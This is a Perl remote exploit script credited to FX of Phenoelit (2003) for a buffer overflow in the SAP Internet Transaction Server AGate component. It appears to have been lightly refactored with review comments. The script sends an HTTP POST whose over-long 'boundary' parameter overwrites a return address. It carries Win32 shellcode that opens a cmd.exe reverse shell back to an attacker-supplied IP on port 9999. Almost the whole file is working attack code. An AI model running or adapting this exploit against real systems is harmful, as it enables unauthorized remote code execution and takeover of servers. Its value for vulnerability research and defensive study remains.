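#!/usr/bin/perl -w
#
# SAP Internet Transaction Server 4.6/6.10 AGate remote exploit
#  - buffer overflow in ASCII handling of "boundary" tag in HTTP POST
#
# FX of Phenoelit
# Dec 2003
#
# What this script does (as far as the code below shows):
#  - sends a multipart POST to /scripts/wgate/systeminfo/!? whose
#    "boundary=" parameter is 263 filler bytes followed by a 4-byte
#    return address; that over-long boundary is the overflow trigger;
#  - the POST body carries a Win32 shellcode (it references WS2_32.DLL
#    and cmd.exe) that connects back to <callback-ip> on TCP port 9999;
#    the port is hard-coded in the shellcode (0x270F = 9999), so a
#    listener must already be waiting there.
#
# Use only against systems you are authorized to test.
#
use strict;
use warnings;
use IO::Socket;

# --- command line --------------------------------------------------------
if (@ARGV != 3) {
    print "Usage: $0 <target-host> <target-port> <callback-ip>\n";
    exit 1;
}
my ($host, $port, $myself) = @ARGV;

print " * * * SAP ITS AGate 4.6/6.1 remote * * *\n".
      " --==]] Phenoelit - http://www.phenoelit.de/whatSAP/ [[==--\n".
      " by FX - 2003\n\n";
$| = 1;

# --- overflow trigger (goes into the "boundary=" header parameter) -------
my $loginstr = "/scripts/wgate/systeminfo/!?";

my $t = "A" x 263;
$t .= "\xB8\x23\x0E\x0E";    # call EDI (at 0x010023B8)
# Trick: the 0x0E gets cut off and replaced by the final 0x00 character
# of the string, which we need.
# Universal address for
#   W2K Srv En SP2 / ITS 6.10
#   W2K Srv En SP4 / ITS 6.10
#   W2K Srv De SP0 / ITS 6.10
#   W2k Srv En SP2 / ITS 4.60

# --- callback address ----------------------------------------------------
# The callback IP is patched into the shellcode as one raw byte per octet,
# so it must be a well-formed dotted quad.  The original unanchored match
# was never checked: on a malformed argument $1..$4 were undefined (or
# stale) and the payload silently received NUL bytes; an octet above 255
# would make %c emit a wide character and corrupt both the shellcode and
# the Content-length computed from it.
my @octet = $myself =~ /\A([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\z/
    or die "callback address '$myself' is not a dotted-quad IPv4 address\n";
for my $o (@octet) {
    die "callback address '$myself': octet $o out of range (0-255)\n" if $o > 255;
}
# NOTE(review): an octet of 0 puts a NUL byte inside the shellcode; whether
# the target's copy survives that is not established by this script.
my $conback = sprintf("%c%c%c%c", @octet);
printf("Connecting back to %d.%d.%d.%d:9999\n", @octet);

# --- payload (POST body) -------------------------------------------------
# Bytes 3-4 are the callback port (0x270F = 9999, big-endian) and the next
# four bytes the callback IP.  The trailing text is only padding; the
# shellcode itself is reproduced byte-for-byte from the original.
my $cont =
    "\xeb\x25\x27\x0f".$conback."\x02\x06\x6c\x59\x6c\x59\xf8\x1d".
    "\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f\x33\x32".
    "\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed\x2c".
    "\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x78\x08".
    "\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x4b\x1c\x01".
    "\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20\x01\xfb\x31\xc9".
    "\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31\xc2\xd1\xe2\x84\xc0".
    "\x75\xf7\x0f\xb6\x45\x09\x8d\x44\x45\x08\x66\x39\x10\x75\xe1\x66".
    "\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a".
    "\x8b\x04\x88\x01\xf8\x0f\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09".
    "\x75\xbe\xfe\x4d\x08\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0".
    "\x89\xc7\x6a\x02\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce".
    "\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66".
    "\x89\x30\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8".
    "\x55\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65".
    "\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53".
    "\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1".
    "\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a".
    "\xff\xff\x55\xe4".
    "Funny as it is, the shellcode needs to be longer ;-)";

# --- HTTP request --------------------------------------------------------
# Content-length is the byte length of $cont; the IP validation above keeps
# the body free of wide characters so that length matches what is sent.
my $request =
    "POST ".$loginstr." HTTP/1.0\r\n".
    "Host: ".$host."\r\n".
    "Accept: text/html, text/plain, application/pdf, image/*, image/jpeg, text/sgml, video/mpeg, image/jpeg, image/tiff, image/x-rgb, image/png, image/x-xbitmap, image/x-xbm, image/gif, application/postscript, */*;q=0.01\r\n".
    "Accept-Encoding: gzip, compress\r\n".
    "Accept-Language: en\r\n".
    "Pragma: no-cache\r\n".
    "Cache-Control: no-cache\r\n".
    "User-Agent: Stasi\r\n".
    "Referer: http://www.phenoelit.de/owns/your/SAP/now\r\n".
    "Content-type: multipart/form-data; ".
    "boundary=---------------------------".$t."\r\n".
    "Content-length: ".length($cont)."\r\n\r\n".
    $cont;

print "Sending request - Size ", length($request), "\n";
send_request_1();
exit 0;

############################################
# Connects to $host:$port over TCP, writes $request and echoes whatever the
# server sends back until it closes the connection.  Dies (with the
# IO::Socket error in $@) if the connection cannot be established.
# NOTE(review): if the AGate process dies without closing the socket, the
# read loop below blocks; there is no read timeout.
sub send_request_1 {
    my $remote = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $host,
        PeerPort => $port,
    ) or die "cannot connect to http daemon on $host:$port: $@\n";
    $remote->autoflush(1);
    print {$remote} $request;
    while (my $rline = <$remote>) {
        print $rline;
    }
    close $remote;
}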